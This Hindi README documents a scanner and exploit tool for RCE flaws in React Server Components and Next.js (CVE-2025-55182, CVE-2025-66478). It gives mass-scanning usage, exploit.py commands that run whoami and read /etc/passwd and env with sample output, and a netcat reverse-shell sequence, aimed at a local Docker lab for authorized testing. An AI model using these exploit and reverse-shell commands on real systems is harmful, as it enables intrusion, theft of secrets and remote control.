
React2shell-web-scanner
उच्च-निष्ठा भेद्यता स्कैनर CVE-2025-55182 और CVE-2025-66478 के लिए - React Server Components / Next.js में रिमोट कोड निष्पादन भेद्यताएँ।
📖 विस्तृत तकनीकी विश्लेषण, शोषण तंत्र और IOC डेटा के लिए, SECURITY-RESEARCH.md देखें
यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। इन उपकरणों का उपयोग केवल उन सिस्टम पर करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है। लेखक दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेते हैं।
| CVE | विवरण | CVSS |
|---|---|---|
| CVE-2025-55182 | React Server Components असुरक्षित डिसीरियलाइज़ेशन RCE | 9.8 Critical |
| CVE-2025-66478 | Next.js Server Actions RCE | 9.8 Critical |
प्रभावित पैकेज:
react-server-dom-webpack: 19.0.0, 19.1.0, 19.1.1, 19.2.0react-server-dom-turbopack: 19.0.0, 19.1.0, 19.1.1, 19.2.0react-server-dom-parcel: 19.1.0, 19.1.1, 19.2.0फिक्स्ड वर्शन:
# कोई स्थापना आवश्यक नहीं - uv निर्भरताओं को संभालता है
uv run react2shell-scanner -u https://example.com
pip install requests tqdm dnspython
python3 react2shell-scanner -u https://example.com
# एकल URL
python3 react2shell-scanner -u https://example.com
# सुरक्षित मोड (RCE निष्पादन नहीं)
python3 react2shell-scanner -u https://example.com --safe-check
# होस्ट फ़ाइल से
python3 react2shell-scanner -l targets.txt -t 50 -o results.json
# CIDR रेंज
python3 react2shell-scanner --cidr 192.168.1.0/24 --ports 80,443,3000
# एकाधिक CIDR रेंज
python3 react2shell-scanner --cidr 10.0.0.0/24 --cidr 172.16.0.0/24
# सबडोमेन एन्युमेरेशन
python3 react2shell-scanner -u example.com --enumerate-subdomains
# कस्टम सबडोमेन वर्डलिस्ट
python3 react2shell-scanner -u example.com --enumerate-subdomains \
--subdomain-wordlist "app,api,admin,portal,staging"
# कस्टम पथ
python3 react2shell-scanner -u https://example.com \
--path / --path /_next --path /api
# फिंगरप्रिंटिंग छोड़ें (सब कुछ स्कैन करें)
python3 react2shell-scanner -l targets.txt --skip-fingerprint --force-scan
# SSL अक्षम के साथ वर्बोज़
python3 react2shell-scanner -u https://example.com -k -v
# Phoenix पर निष्कर्ष अपलोड करें
python3 react2shell-scanner -l targets.txt \
--upload-phoenix \
--phoenix-config .phoenix.config
# डीबग मोड (पेलोड सहेजें)
python3 react2shell-scanner -l targets.txt \
--upload-phoenix \
--debug
# सभी परिणाम अपलोड करें (केवल भेद्यताएँ नहीं)
python3 react2shell-scanner -l targets.txt \
--upload-phoenix \
--all-results
.phoenix.config बनाएँ:
[phoenix]
client_id = your_client_id_here
client_secret = your_client_secret_here
api_base_url = https://api.demo.appsecphx.io
assessment_name = React2Shell Scanner - Web Vulnerabilities
import_type = new
या पर्यावरण चर का उपयोग करें:
export PHOENIX_CLIENT_ID=your_client_id
export PHOENIX_CLIENT_SECRET=your_client_secret
export PHOENIX_API_URL=https://api.demo.appsecphx.io
export PHOENIX_ASSESSMENT_NAME="React2Shell Scanner"
एक Docker-आधारित परीक्षण वातावरण शामिल है। त्वरित संदर्भ के लिए Lab-instructions-sample.md देखें।
# लैब शुरू करें
cd test-lab/lab
docker-compose up -d
# सेवाएँ:
# - असुरक्षित: http://localhost:3011
# - पैच किया गया: http://localhost:3012
# असुरक्षित उदाहरण का परीक्षण करें (सुरक्षित साक्ष्य संग्रह)
python3 react2shell-scanner -u http://localhost:3011 -o evidence.json -e
# पैच किए गए उदाहरण का परीक्षण करें
python3 react2shell-scanner -u http://localhost:3012 -o evidence.json -e
# पूर्ण डेमो चलाएँ
./test-and-demo.sh --full-demo
⚠️ नोट: शोषण कमांड (जैसे,
exploit.py -c "whoami") वास्तविक RCE ट्रिगर करते हैं। केवल शोध उद्देश्यों के लिए स्थानीय Docker कंटेनरों पर ही उपयोग करें।
असुरक्षित लक्ष्यों पर कमांड निष्पादित करें। Python 3.11+ आवश्यक
cd test-lab
pip3.11 install -r requirements.txt
# या: pip3.11 install rich-click fake-useragent rich requests
# बुनियादी कमांड निष्पादन
python3.11 exploit.py -u http://localhost:3011 -c "whoami"
# आउटपुट: nextjs
python3.11 exploit.py -u http://localhost:3011 -c "id"
# आउटपुट: uid=1001(nextjs) gid=65533(nogroup) groups=65533(nogroup)
python3.11 exploit.py -u http://localhost:3011 -c "hostname"
# आउटपुट: 99e28775bf80 (कंटेनर ID)
# सिस्टम एन्युमेरेशन
python3.11 exploit.py -u http://localhost:3011 -c "uname -a"
python3.11 exploit.py -u http://localhost:3011 -c "cat /etc/passwd"
python3.11 exploit.py -u http://localhost:3011 -c "env | head -20"
# एप्लिकेशन टोही
python3.11 exploit.py -u http://localhost:3011 -c "pwd"
# आउटपुट: /app
python3.11 exploit.py -u http://localhost:3011 -c "ls -la"
python3.11 exploit.py -u http://localhost:3011 -c "cat package.json"
python3.11 exploit.py -u http://localhost:3011 -c "node --version"
# नेटवर्क जानकारी
python3.11 exploit.py -u http://localhost:3011 -c "cat /etc/hosts"
python3.11 exploit.py -u http://localhost:3011 -c "netstat -an | head -20"
# प्रक्रिया एन्युमेरेशन
python3.11 exploit.py -u http://localhost:3011 -c "ps aux"
# Docker नेटवर्क गेटवे प्राप्त करें
GATEWAY=$(docker network inspect lab_react-rsc-lab --format '{{range .IPAM.Config}}{{.Gateway}}{{end}}')
# सुनने वाला शुरू करें (दूसरे टर्मिनल में)
nc -lvnp 4444
# रिवर्स शेल लॉन्च करें
python3.11 exploit.py -u http://localhost:3011 -r -l $GATEWAY -p 4444 -P nc-mkfifo
# उपलब्ध पेलोड प्रकार: nc, nc-mkfifo, sh, bash, perl
[VULNERABLE] https://vulnerable.example.com
Status: 307
Detection: rce_arithmetic_check
[IOC MATCH] 93.123.109.247
IP 93.123.109.247 ज्ञात दुर्भावनापूर्ण बुनियादी ढांचे से मेल खाता है
[NEXTJS] https://safe.example.com v15.0.0
[NOT VULN] https://other.example.com
{
"scan_time": "2025-12-08T10:00:00Z",
"scanner": "React2Shell Scanner v2.0",
"cves": ["CVE-2025-55182", "CVE-2025-66478"],
"total_scanned": 100,
"vulnerable_count": 3,
"ioc_matches": 1,
"results": [
{
"target": "https://vulnerable.example.com",
"ip": "203.0.113.50",
"fqdn": "vulnerable.example.com",
"verdict": "VULNERABLE",
"vulnerable": true,
"nextjs_detected": true,
"detection_method": "rce_arithmetic_check"
}
]
}
स्कैनर में सक्रिय शोषण अभियानों से ज्ञात समझौता संकेतक (IOC) शामिल हैं:
payloads-exploits/iocs.csv सेpayloads-exploits/weaponized-payloads सेpayloads-exploits/iocs_patterns.csv मेंपहचाने गए IOC मैच उच्च गंभीरता के साथ चिह्नित किए जाते हैं।
| फ़ाइल | सामग्री |
|---|---|
iocs.csv | भू-स्थान डेटा के साथ 32 ज्ञात दुर्भावनापूर्ण IP |
--safe-check)echo $((41*271)) निष्पादित करता हैreact2shell-scanner-CVE-2025-55182/
├── react2shell-scanner # मुख्य स्कैनर स्क्रिप्ट
├── cve-2025-66478-web-scan # मूल स्कैनर संदर्भ
├── nuclei-rules # Nuclei टेम्पलेट
├── test-and-demo.sh # परीक्षण स्वचालन
├── README.md # यह फ़ाइल
├── SECURITY-RESEARCH.md # विस्तृत तकनीकी विश्लेषण
├── Lab-instructions-sample.md # त्वरित लैब परीक्षण गाइड
├── payloads-exploits/
│ ├── iocs.csv # ज्ञात दुर्भावनापूर्ण IP
│ ├── iocs_patterns.csv # विस्तारित IOC (डोमेन, URL, हैश)
│ ├── weaponized-payloads # वास्तविक दुनिया के हमले के पेलोड
│ └── exploit-2025-55182 # कच्चा HTTP शोषण अनुरोध
└── test-lab/
├── exploit.py # शोषण उपकरण
├── lab/
│ ├── docker-compose.yml
│ ├── vulnerable/ # असुरक्षित Next.js ऐप
│ └── patched/ # पैच किया गया Next.js ऐप
└── packages/
├── vulnerable/ # असुरक्षित npm पैकेज
└── patched/ # पैच किए गए npm पैकेज
| रिपॉजिटरी | उद्देश्य |
|---|---|
| react2shell-scanner-CVE-2025-55182 | लैब, स्कैनर और शोषण (यह रिपो) |
| react2shell-scanner-rce-react-next | वेब इंटरफ़ेस के साथ पूर्ण स्कैनर |
यह उपकरण अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है। किसी भी लक्ष्य को स्कैन करने से पहले आपके पास स्पष्ट लिखित अनुमति होनी चाहिए। अनधिकृत स्कैनिंग कंप्यूटर अपराध कानूनों का उल्लंघन कर सकती है।
जिम्मेदारी से उपयोग करें:
वेब को सुरक्षित बनाने के लिए काम कर रहे सुरक्षा शोधकर्ताओं द्वारा लाया गया।
| विकल्प | विवरण |
|---|
-u, --url | लक्ष्य URL (आवश्यक) |
-c, --cmd | निष्पादित करने के लिए कमांड |
-r, --reverse | रिवर्स शेल मोड सक्षम करें |
-l, --lhost | रिवर्स शेल के लिए सुनने वाला होस्ट |
-p, --lport | रिवर्स शेल के लिए सुनने वाला पोर्ट |
-P, --payload | पेलोड प्रकार: nc, nc-mkfifo, sh, bash, perl |
--timeout | अनुरोध टाइमआउट (डिफ़ॉल्ट: 10s) |
iocs_patterns.csv |
| विस्तारित IOC: C2 डोमेन, ड्रॉपर URL, मैलवेयर हैश, Monero वॉलेट |
weaponized-payloads | सक्रिय शोषण में देखे गए वास्तविक दुनिया के हमले के पेलोड |
exploit-2025-55182 | शोषण के लिए कच्चा HTTP अनुरोध प्रारूप |